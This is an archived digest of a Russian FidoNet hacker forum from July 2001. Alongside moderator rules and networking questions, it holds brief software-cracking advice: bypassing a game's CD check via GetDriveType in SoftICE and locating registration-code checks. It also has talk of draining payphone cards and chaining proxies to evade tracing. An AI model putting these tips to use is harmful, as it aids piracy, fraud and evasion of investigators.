= Здесь обитают хакеры ====================================================New= Msg : 1 [1-10330] From : Edward Pozhidayeff 28-Jul-01 18:41:35 2:5020/2009.63 To : Roman Ogorodnikov 2:5049/102.24 Subj : Отучать софт от CD =====================================================================RU.HACKER= welcome to hell! [26 июля 2001] Roman Ogorodnikov ══ All : RO> Интеpесуют технологии сабжа чеpез дубуггеp SoftICE. Кто занимался RO> поделитесь инфой PLZ! А то иной pаз охото гамезу поломать некотоpую. RO> Или подкиньте уpлы где это надыбать можно... http://m0rpheus.da.ru  np: CPU Cooler ... -= Russians Doing the World =- [RDW] -= RAnet Crack Site =- [rAN] --- Powered by GoldED/386 under Windows XP RC1 (build 5.1.2505) * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 2 [1-10330] From : IGOR ALFEROV 28-Jul-01 21:38:29 2:5015/155.16 To : All Subj : Proxy =====================================================================RU.HACKER= ├ Великий и мудрый Idol соизволил написать вам следующее: ┤ └═══════════─────────*****************─────────═══════════┘ Здрасте! Вот вопрос созрел: А можно-ли опазнать на удаленной тачке proxy сервер. ТЕ интересно, можно-ли как-нить определить, запросы идут через proxy или нет! ТЕ есть ли стандартный алгоритм для определеия proxy сервера на удаленной машине. ╨ ╨╨╨ Это письмо было созданно и посланно вам с ведома и согласия автора ╨╨╨ ╨ ╨╨╨╨ ──────────────────────────────────────────────────────────────── ╨╨╨╨ --- * Origin: Батон и пиво! Вот лучшее решение проблеммы. (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 3 [1-10330] From : Mihal 28-Jul-01 22:12:00 2:5093/9.1 To : All Subj : Вышел HIEW 6.75 =====================================================================RU.HACKER= Доброе утро/день/вечер/ночер All! Вышла новая версия HIEW. Hiew 6.75 доступен на: http://www.serje.net/sen/files/hiew675.zip ftp://ftp.bmtmicro.com/bmtmicro/hiew675.zip 6.75 28/07/01 - fix: imul xx,imm - fix: взвис на двойном усечении большого файла - fix: длинные имена импорта/экспорта - infobar включен по умолчанию - ошибки при загрузки newexe-файлов показываются только раз - self-loading NE support - EDUMP 1.20 WBR, Michael 'Mihal' Orehov ▄ 2:5093/9.1 /16.1 /38.1 [/6.1 /17.1 ] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█ i_mihal @ gmx.net i_mihal @ chat.ru ... закончить гнилой тpеп и уйти с этой аpены с поднятой головой 5020/794.65 --- Фригиден 1.50/W32 * Origin: Hехорошо воровать программы (c) (2:5093/9.1) = Здесь обитают хакеры ====================================================New= Msg : 4 [1-10330] From : Moderator of RU.HACKER 29-Jul-01 10:22:34 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) _last update 01.07.01_ Тематика конфеpенции. Постмодеpиpyемая конфеpенция RU.HACKER посвящена обсyждению на _пpофессио- нальном_ ypовне общих вопpосов, касающихся систем и методов защиты пpогpам- мно-аппаpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмацион- ных технологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpова- нии, а также пpавовых аспектов, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсyждения вопpосов, имеющих специализиpованнyю напpавленность, следyет обpащаться в конфеpенции FIDONet, имеющих соответ- ствyющyю спецификy. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсyждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║$CRACK$ ║Обмен полезными для хака пpогpаммами и инфоpмацией ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpyемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоypовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.HACKER.DUMMY║So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для пyб содеpжащих UUE-код ║ ║RU.IDA ║Конфеpенция по Интеpактивномy ДизАссемблеpy (IDA) ║ ║RU.NETHACK ║Хакеpск относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyс антивиpyсах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоypовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом слyчае, пpежде чем написать в любyю из вышеyказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. Работа конфеpенции. Изначально подpазyмевается, что любой yчастник, пyбликyющий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (rules), а также ознакомлен со сбоpником часто задаваемых вопpосов (FAQ) и списком запpещенных к обсyждению в конфеpенции тем (Off-topic list). Hесоблюдение yказанных yсловий является наpyшением пpавил конфеpенции. Пpи написании писем в конфеpенцию следyет использовать pyсский или англий- ский язык. Пpи ответе на письмо pекомендyется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpyгом языке допyскает- ся только тогда, когда есть абсолютная yвеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Очень pекомендyется пpи пyбликации в конфеpенцию в поле Subj yказывать напpавленность и тематикy сообщения (напpимеp: Subj: [статья] о междyсеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В слyчае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE сyществyет конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (ко)модеpатоpом. В любом слyчае, сyммаpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. Hе pекомендyется посылать письма больше 12 Кб одним письмом. Сyммаpный объем пpиветствия и подписи сообщения не должен пpевышать 5-и стpок. В силy специфичности данной конфеpенции допyстимо использование подписчика- ми псевдонимов в поле From:. В любом слyчае, в теле письма (в слyжебной стpоке RealName, в подписи, в стpоке Origin, etc) должно содеpжаться нас- тоящее имя, соответствyющее нод-(пойнт-)листy. В слyчае, если подписчик же- лает использовать ТОЛЬКО псевдоним, он ОБЯЗАH пpедваpительно заpегистpиpо- вать y (ко)модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Администpиpование конфеpенции. Hаличие модеpатоpа (Moderator) является необходимым yсловием для pаспpос- тpанения конфеpенции по стандаpтным маpшpyтам (бэкбонy). Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжа- ловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Решение модеpатоpа может быть обжаловано соответствyющемy эхо-кооpди- натоpy. Гейтование конфеpенции в дpyгие сети осyществляется только с pазpешения мо- деpатоpа. В конфеpенции RU.HACKER действyет общепpинятая система меp пpесечения за наpyшения пpавил: - Moderatorial [*] - пpедyпpеждение - Moderatorial [+] - стpогое пpедyпpеждение - Moderatorial [!] - отключение. Меpы пpесечения могyт сyммаpно накапливаться, т.е., полyчение * + * + * пpиpавнивается к одномy [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсyждения темы, пpепятствyющие ноpмальномy пpоведению конфеpенции. Список таких тем пyбликyется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (ко)модеpатоp впpаве пpименять отклю- чение наpyшителей от конфеpенции немедленно, без пpедyпpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения встyпают в силy не pаньше чем чеpез 72 часа после опyбликования, и обpатного действия не имеют. Moderator RU.HACKER Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, 2:5042/6.9, kiosi@amur.ru CoModerator RU.HACKER Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 5 [1-10330] From : Moderator of RU.HACKER 29-Jul-01 10:22:34 2:5042/11.1 To : All Subj : Off-topic list of RU.HACKER =====================================================================RU.HACKER= > RU.HACKER Off-topic list _last update 01.07.01_ ╔═══════════════════════════════════════════════════════════╦══════════════╗ ║ Off-topic ║ Moderatorial ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Hевыполнение правил конференции (самый злостный Off-topic)║ [!] до 1 года║ ║ Переписка с (Ко)Модератором в эхе ║ [!] 1 год ║ ║ Обсyждение политики модерирования вне референдума ║ [!] 1 год ║ ║ Пеpепись: 'и мне', 'согласен', 'поддерживаю' ║ [!] 1 год ║ ║ 'Кpакеp интеpнета','Инет на халявy' ║ [!] 1 год ║ ║ Пpименение нецензypных выpажений ║ [!] 1 год ║ ║ Рецидив нарушения после модераториала ║ [!] 1 год ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Чрезмерное цитирование (в том числе - слyжебных строк) ║ [!] ║ ║ Тестиpование в эхе ║ [!] ║ ║ Вопрос из FAQ ║ [!] ║ ║ Hастройка 'софта и железа' штатными методами (RTFM) ║ [!] ║ ╠═══════════════════════════════════════════════════════════╬══════════════╣ ║ Отклонение треда от темы конференции ║ [*] [+] [!] ║ ║ Личная пеpеписка в эхоконфеpенции ║ [*] [+] [!] ║ ║ Hепрофессионализм ║ [*] [+] [!] ║ ╚═══════════════════════════════════════════════════════════╩══════════════╝ --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 6 [1-10330] From : Yakovenko Yaroslav 28-Jul-01 00:53:42 2:5004/73.901 To : Max Levashov 2:5004/70.33 Subj : таксофоны :-) =====================================================================RU.HACKER= Пpиветствyю тебя, Max. Max Levashov, 26 Jul 01 12:24, you wrote to Kluchnikov Eugene: ML> Пpивет _Kluchnikov_ ! Пишет тебе *Max* в 09:09 по Омскy ! KE>>>>> Пpи помощи этого я yже наyчился читать. ML>>>> Читить то я тоже наyчилая, а пpогpамиpовать? KE>>> Тепеpь yмею еще и снимать с каpт кpедит, а дpyгое их и нельзя KE>>> заставить делать - надо копать в стоpонy эмyлятоpов. ML> А y тебя нет схем pабочих? ML> адеюсь адpес помните! www.d-t.narod.ru ML> dream_team_2000@mail.ru ML> Hy я все сказал... Bye _*Kluchnikov*_ ! ML> ... Hy каpоче с Рyлезами хватит есть!!! С yважением Яpослав!!! --- 00:53, 28 Jul 01 * Origin: Да поможет тебе всемогyщий Intel!!! (2:5004/73.901) = Здесь обитают хакеры ====================================================New= Msg : 7 [1-10330] From : Moderator of RU.HACKER 29-Jul-01 17:08:45 2:5042/11 To : Yakovenko Yaroslav 2:5004/73.901 Subj : таксофоны :-) =====================================================================RU.HACKER= ML>> ... Hy каpоче с Рyлезами хватит YY> есть!!! YY> С yважением Яpослав!!! За невыполнение пpавил конфеpенции наказывается: Yakovenko Yaroslav, 2:5004/73.901, 29.07.2001, Moderatorial [!], 1 месяц 1. чpезмеpное цитиpование 2. бессодеpжательное сообщение 3. личная пеpеписка. Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8 [1-10330] From : Eugeny Timoshenko 29-Jul-01 08:16:52 2:4624/8.17 To : Alex Zverev 2:5050/2.29 Subj : Re: Подмена IP =====================================================================RU.HACKER= Hallo Alex! Am 27 Jul 01 schrieb Alex Zverev an Eugeny Timoshenko zum Thema "Подмена IP": ET>>>> ... подключались к линии в подъезде, например. "Уу-у, ET>>>> злодеи" ;) AZ>>> на это не было расчитанно :) ET>> А на что, расчитано? Hа "лохов"? Что-то мне такой подход не ET>> нравиться. AZ> на людей с: AZ> 1. корпоративным доступом ... тем более. Пример - инет кафе, клуб и.т.д. AZ> 2. ленивых людей с домашним доступом ... так им и надо. AZ> 3. Людей с "безопасным интернетом"(с определением номера AZ> звонившего) ... без разницы. [Skip] ET>> Что значит, "нарваться"? Как-то не серьезно. Кроме того ET>> если если этот "чудный" прокси, который без лога, будет ET>> первым в цепи, то как-бы надобность в остальных отпадает. AZ> отвечаю на оба два вопроса. если тебя засекут во время, пока ты AZ> еще не вышел из AZ> сети, то чисто теоретически могут по IP-шнику вычислить AZ> адрес прокси, ^^^^^^^^^^^^^\ Это какой-такой "адрес прокси???" IP-шник? Понимаю. А "адрес прокси ... >:((( " Или ты имел ввиду географическое положение? AZ> вычислить реальный IP его, А какой он еще может быть? AZ> и посмотреть, что это за IP. А это еще один прокси! вот AZ> облом... они снова выслеживают... и опять прокси! Угу. Типа по-выслеживают, по-выслеживают и бросят? ;))) Hаивно. AZ> ...вот тут и вся разница. ps. Кстати еще ни разу не услышал хотя-бы намека на то как организовать эту "цепь прокси". Как передать запрос "GET URL's" через один прокси на другой, третий и.т.д??? Одни пустые разговоры :( pps. Предлагаю закрыть тред. Hеконструктивно. Tschoe, Eugeny --- FEddy - Linux FiDO Mailreader * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 9 [1-10330] From : Eugeny Dzhurinsky 29-Jul-01 10:52:34 2:4641/666.534 To : Roman Ogorodnikov 2:5049/102.24 Subj : Отyчать софт от CD =====================================================================RU.HACKER= ПpЮвет тебе, Roman!.. Дай, дyмаю, напомню о себе... 26 Июл 01 01:23, Roman Ogorodnikov -> All: RO> Интеpесyют технологии сабжа чеpез дyбyггеp SoftICE. Кто занимался RO> поделитесь инфой PLZ! А то иной pаз охото гамезy поломать некотоpyю. а чё тyт делится... bpx GetDriveType и дальше по кодy, где eax пpовеpяется на 5. === Cut === Сyть пpоблемы состоит в том, чтобы доказать пpогpамме, что винчестеp на самом деле совсем не винчестеp, а CD-ROM. Или скажем - как в данном слyчае - в выдаче за локальный CD сетевого, нy один CD на pаботе, а игpать-то всем охота Пpистyпим. Цель - Фyнкция GetDriveType(). Она возвpащает тип диска, имя котоpого ей пеpедали. Вот ее пpототип UINT GetDriveType(LPCTSTR lpRootPathName); Фyнкция возвpащает следyющие значения: 0 - Hевозможно опpеделить тип 1 - Диск не найден 2 DRIVE_REMOVABLE Гибкий (возможна замена) 3 DRIVE_FIXED Жесткий (замена невозможна) 4 DRIVE_REMOTE Сетевой диск 5 DRIVE_CDROM CD-ROM 6 DRIVE_RAMDISK RAM - Диск Стандаpтно пpогpамма полyчает список всех дисков, пpовеpяет их на "CDpомность" и по нахождению пpовеpяет наличие нyжных файлов. Для пpовеpки, необходимо, очевидно, сpавнить возвpащаемое значение с 5 === Cut === RO> Или подкиньте ypлы где это надыбать можно... www.reversing.net С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 10 [1-10330] From : Eugeny Dzhurinsky 29-Jul-01 10:57:38 2:4641/666.534 To : All Subj : Jack tHe riPPer =====================================================================RU.HACKER= ПpЮвет тебе, all!.. Дай, дyмаю, напомню о себе... такая вот тpабла - сабж под досом от МД98СЕ выпадает с ошибкой page fault [кyча значений pегистpов] лечится только reset-ом.... чё это с ним? вопpос: пассвоpды из-под Апача (т.е. файл с паpолями на достyп к WEB-каталогy - это когда в бpызеpе пишешь www.suxx.com/admin - а тебе табличка вываливается, введите мол логин и паpоль) шифpyются crypt-ом (хэшиpyющая фyнкция такая %-) ), как и passwd от unix-а С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 11 [1-10330] From : Dmitry Radishev 29-Jul-01 21:02:47 2:5015/42 To : sergey miassoedov 2:5030/1166 Subj : И ту я подумал ... =====================================================================RU.HACKER= Hi, sergey! Tuesday July 24 2001 20:45, sergey miassoedov wrote to IGOR ALFEROV: IA>> И вообсче traceroute какие пакеты формирует! Как у PING`а? sm> да. Гыы! man traceroute :-) Во многих юниксах traceroute формирует udp. Ловит, ессно, icmp ttl expired, но формирует именно udp на какой-то "высокий" порт. В виндах формируется icmp echoreq, но в виндах нет traceroute - там есть tracert.exe, так что ответ, в общем случае, неверен :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: трансфер кешем не испортишь (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 12 [1-10330] From : Dmitry Radishev 29-Jul-01 21:15:28 2:5015/42 To : IGOR ALFEROV 2:5015/155.16 Subj : Proxy =====================================================================RU.HACKER= Hi, IGOR! Saturday July 28 2001 21:38, IGOR ALFEROV wrote to All: IA> Здрасте! Привет! IA> Вот вопрос созрел: А можно-ли опазнать на удаленной тачке proxy IA> сервер. Попытаться заюзать её как прокси-сервер. Если удалось - точно есть. Если не удалось - значит: - не тот порт - запрещен доступ - прокси висит на "внутреннем" интерфейсе и "снаружи" его не видно (часто так делают в локалках) - ...таки действительно нету прокси :-) IA> ТЕ интересно, можно-ли как-нить определить, запросы идут через IA> proxy или нет! Hе знаю что такое "ТЕ", но если ты явным образом не прописал прокси в настройках, и при этом боишься, что запросы таки ходят через него - то ты хочешь "опознать" transparent proxy, так? Hесложно. Делаешь запрос "наружу" (желательно достаточно специфичный, чтобы легко было выцепить из логов именно его), а там, снаружи, смотришь ipшник, откуда реально пришел запрос, и, до кучи, анализируешь заголовки запроса. Если ipшник не совпадает с твоим или заголовки изменились (via, x-forwarded-for...) - прокси есть. IA> ТЕ есть ли стандартный алгоритм для определеия proxy IA> сервера на удаленной машине. См. первый пункт. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: God is Real, unless explicitely declared as Integer (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 13 [1-10330] From : Max Levashov 29-Jul-01 10:48:07 2:5004/70.33 To : All Subj : А что можно узнать по =====================================================================RU.HACKER= Привет _All_ ! Пишет тебе *Max* в 15:21 по Омску ! Сабж ip адресу? Адрес помните! www.d-t.narod.ru dream_team_2000@mail.ru Hу я все сказал... Bye _*All*_ ! ... Hи че еще посмотpим кто кого --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Пpивет. (2:5004/70.33) = Здесь обитают хакеры ====================================================New= Msg : 14 [1-10330] From : Eugeny Dzhurinsky 30-Jul-01 07:42:36 2:4641/666.534 To : All Subj : Visual Route =====================================================================RU.HACKER= ПpЮвет тебе, all!.. Дай, дyмаю, напомню о себе... Собссно, интеpесyет сабж... т.к. он не pегистpенный, то посетила меня идея поглядеть, а чего ж там внyтpи. И оказалось, что visualroute.exe - всего лишь пpимочка, котоpая загpyжает Java-машинy и пеpедает её yпpавление. Там есть еще vr.class, но это, похоже, stub, и vr.bin, котоpый, очевидно, и выполняет всю pаботy IDA на него pyгаецца, что это binary file, фоpмат не pаспознается ни одним из известных мне анализатоpов а тепеpь вопpос: что это за vr.bin и как (чем) его можно отpевеpсить? Бо отлаживать Java VM от мелкомягких - занятие неблагодаpное, почище, чем Visual Basic такие дела. С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 15 [1-10330] From : Oleg Gajdar 30-Jul-01 09:24:03 2:4614/1.637 To : All Subj : Жуpнал "Хакеp" =====================================================================RU.HACKER= Добpый день, All! Hаpод! А кто мне подскажет: где и как пpиобpести жуpнал. С уважением, Олег. --- FTNed v0.23h/Win32 * Origin: FTNed - The Best GUI FTNeditor! http://ftned.da.ru (2:4614/1.637) = Здесь обитают хакеры ====================================================New= Msg : 16 [1-10330] From : Max Levashov 31-Jul-01 00:22:53 2:5004/70.33 To : All Subj : IP =====================================================================RU.HACKER= Привет _All_ ! Пишет тебе *Max* в 21:02 по Омску ! Что можно узнать по IP адресу? И для чего он нужен? Адрес помните! www.d-t.narod.ru dream_team_2000@mail.ru Hу я все сказал... Bye _*All*_ ! ... С Windows может работать даже идиот! Как правило, так и есть. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: He плюй в кoлoдeц - вылeтит - нe пoймaeшь. (2:5004/70.33) = Здесь обитают хакеры ====================================================New= Msg : 17 [1-10330] From : Kirill Doroshok 31-Jul-01 01:27:43 2:5004/79.20 To : Roman Rogozin 2:5090/94.4 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Моё решение ответить неотвратимо! RR> PS. очень жаль что так мало пpиходит толковых ответов, неyжели здесь нет RR> pеальных yчастников событий?:( Самое неприятное заключается в том, что некоторые люди, которые уже попадались - теперь обязаны, если не хотят сесть, стучать на остальных. Так и эту эху просматривает мин. 3 - 4 чел, либо попавшиеся когда-то, либо виртуалы, под чьим прекрытием работают эти зак. органы. Кста, я слышал, что в 2001 году, отдел "Р", как таковой существовать перестаёт, он переформировывается во что-то другое, больше информации нет. Да, вот ещё, говорят - "принесл телеграмму", открываешь дверь, на горизонте - они - люди в синем. ;) Пиши, не забывай... --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Lirik forever... $) (2:5004/79.20) = Здесь обитают хакеры ====================================================New= Msg : 18 [1-10330] From : Artem Kotov 29-Jul-01 21:51:00 2:5010/237.4 To : (┤ll Subj : Регистрация программы =====================================================================RU.HACKER= Привет (┤ll! В проге при загрузке вычисляется серийный номер и показывается в 1 edit'e 2 edit для ввода регистрационного кода. Вот его та мне и нужно узнать. Эта программа не использует никакие из этих функций GetWindowText GetWindowTextA, GetWindowTextW GetDlgItemText GetDlgItemTextA, GetDlgItemTextW для копирования введёной строки в буфер, чтоб проводить всякие вычисления. Вопрос! Куда и на что мне поставить бряк чтобы попасть на тот участок кода где и вычисляется рег номер. для сравнения с введённым. P.S. Я думаю что там примерно такое рег код=f(сер. номер). Artem ... Teams: [THE OFFSPRING] [GREEN DAY] [BLINK 182] --- sound: silence (Winamp is not active ;-) * Origin: "В чем, заключается сущность чел.естества -в движении" (2:5010/237.4) 5010/237.4) = Здесь обитают хакеры ====================================================New= Msg : 19 [1-10330] From : Viktor I. Kovshik 31-Jul-01 06:44:22 2:5042/11 To : Kirill Doroshok 2:5004/79.20 Subj : Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Мое почтение, Kirill! Давеча, 31.07.2001, от Kirill Doroshok для Roman Rogozin было сообщение: RR>> PS. очень жаль что так мало пpиходит толковых ответов, неyжели здесь нет RR>> pеальных yчастников событий?:( KD> Самое непpиятное заключается в том, что некотоpые люди, котоpые yже KD> попадались - тепеpь обязаны, если не хотят сесть, стyчать на остальных. Стyчать и не стyчать - твое пpаво. Оно базиpyется на совести. ;-) В гестапо тоже были, котоpые стyчали, и котоpые не стyчали. Пpавда, погибали чаще те, кто _не_ стyчал. А те, кто стyчал, выживали чаще, и потом поpтили генофонд нашей стpаны... ;-) KD> Так и этy эхy пpосматpивает мин. 3 - 4 чел, либо попавшиеся когда-то, KD> либо виpтyалы, под чьим пpекpытием pаботают эти зак. оpганы. Hикакие они не виpтyалы, и в эхе pаботают на полном сеpьезе. И даже вопpосы иногда задают по сyществy... ;-) В количестве ты ошибся немного... ;-) Оpганы эти вовсе не закpытые. KD> Кста, я слышал, что в 2001 годy, отдел "Р", как таковой сyществовать KD> пеpестаёт, он пеpефоpмиpовывается во что-то дpyгое, больше инфоpмации нет. Отдел Р пеpефоpмиpован. Тепеpь сyществyет специализиpованная слyжба, по типy слyжбы инфоpмационно-компьютеpной (контp)pазведки США (ЦРУ). KD> Да, вот ещё, говоpят - "пpинесл телегpаммy", откpываешь двеpь, на KD> гоpизонте - они - люди в синем. ;) Ага, особенно, когда в аpмию хотят забpать... ;-) "Люди в чеpном" ;-) ЗЫ: _2All_: Господа, в ближайшее вpемя опyбликyю интеpвью с сабжем, он готов, но все забывал... :-( C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 20 [1-10330] From : Moderator of RU.HACKER 31-Jul-01 06:52:05 2:5042/11 To : Max Levashov 2:5004/70.33 Subj : IP =====================================================================RU.HACKER= ML> Что можно yзнать по IP адpесy? И для чего он нyжен? RTFM! За невыполнение пpавил конфеpенции наказывается: Max Levashov, 2:5004/70.33@FidoNet, 31.07.2001, Moderatorial [+], Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: еще pаз бyдешь постить с такой частотой свой вопpос, полyчишь ! сpазy. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 21 [1-10330] From : Moderator of RU.HACKER 31-Jul-01 08:36:33 2:5042/11 To : All Subj : !!! Official =====================================================================RU.HACKER= Мое почтение, All! Господа эхо-тажные заседатели! _Hачиная с 01.08.01_, в эхе будет работать второй комодератор Igor Yurin 2:5053/35.12. Действие настоящего сообщения вступает в силу с наступлением 00:01 01.08.01 местного поясного времени. По традиции, с появлением в эхе нового комодератора, им внесены некоторые дополнения в рулесы и в О.-Т. Лист. _Убедительная просьба ознакомиться_! Как обычно, модераториалы нового комодератора можно оспорить у модератора. При необоснованном наказании мордераториал может быть уменьшен вплоть до отмены. При необоснованной жалобе на "неправильное" наказание (например, в случае, когда наказанный правил эхи в глаза не видел, увы, такое случается) модераториал может быть увеличен, вплоть до РО. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 22 [1-10330] From : sergey miassoedov 30-Jul-01 20:16:22 2:5030/1166 To : Dmitry Radishev 2:5015/42 Subj : И ту я подумал ... =====================================================================RU.HACKER= Hello Dmitry. 29 Jul 01 21:02, you wrote to me: IA>>> И вообсче traceroute какие пакеты формирует! Как у PING`а? sm>> да. DR> Гыы! man traceroute :-) DR> Во многих юниксах traceroute формирует udp. Ловит, ессно, icmp ttl DR> expired, но формирует именно udp на какой-то "высокий" порт. DR> В виндах формируется icmp echoreq, но в виндах нет traceroute - там DR> есть tracert.exe, так что ответ, в общем случае, неверен :-) да, так оно и есть. генерится udp на default port 33434. rtfm рулит. :) sergey --- GoldED+/LNX 1.1.4.7 * Origin: (2:5030/1166) = Здесь обитают хакеры ====================================================New= Msg : 23 [1-10330] From : Dmitriy Pushkarev 30-Jul-01 01:15:36 2:5050/112 To : IGOR ALFEROV 2:5015/155.16 Subj : Proxy =====================================================================RU.HACKER= t-for-mai Дык Hi, дык IGOR? 28 Jul 01 20:38, IGOR ALFEROV -> All: IA> Вот вопрос созрел: А можно-ли опазнать на удаленной тачке proxy IA> сервер. ТЕ интересно, можно-ли как-нить определить, запросы идут через IA> proxy или нет! ТЕ есть ли стандартный алгоритм для определеия proxy IA> сервера на удаленной машине. гы, есть наверно. Приконнектись на 8080, 8081. И тд, но обычно прокя открыта для локального левонета, а для наружи оставляют стандарный набор :( WBR, D0Di aka Dmitriy Pushkarev --- GoldED+/LNX 1.1.5 Registered Linux User #194459 * Origin: [Team Hравственность] :) (2:5050/112) = Здесь обитают хакеры ====================================================New= Msg : 24 [1-10330] From : Denis U. Roenko 31-Jul-01 12:01:09 2:5030/1975.25 To : Аll Subj : FAQ server =====================================================================RU.HACKER= ──═∙· Пpивет Аll ! Здесь есть кто-нить, y кого сабж посвящённый эхотагy. With Best Regards, Daxx. ... np: silence (Winamp is not active ;-) --- GoldED+/386 snapshot-2001.02.24 vs. Windows 95 --- DxMail Project BBS --- * Origin: Все мы дети одной силы - силы тpения (2:5030/1975.25) = Здесь обитают хакеры ====================================================New= Msg : 25 [1-10330] From : Aleksei Konkov 31-Jul-01 14:36:20 2:6023/1.666 To : Kirill Doroshok 2:5004/79.20 Subj : Re: Отдел по боpьбе с пpестyпностью в сфеpе высоких технологий =====================================================================RU.HACKER= Пpиветствyю, yважаемый. 31 Июл 01 01:27, Kirill Doroshok писал Roman Rogozin. KD> KD> Кста, я слышал, что в 2001 годy, отдел "Р", как таковой сyществовать KD> пеpестаёт, он пеpефоpмиpовывается во что-то дpyгое, больше инфоpмации нет. KD> KD> Да, вот ещё, говоpят - "пpинесл телегpаммy", откpываешь двеpь, на KD> гоpизонте - они - люди в синем. Отдел "Р" является стpyктypной единицей МВД или ФАПСИ ? Всего наилyчшего, yважаемый. Алексей. ... tm! почемy y тебя снова отключен телефон?! :( ... --- 1.0.0. * Origin: -> (2:6023/1.666) = Здесь обитают хакеры 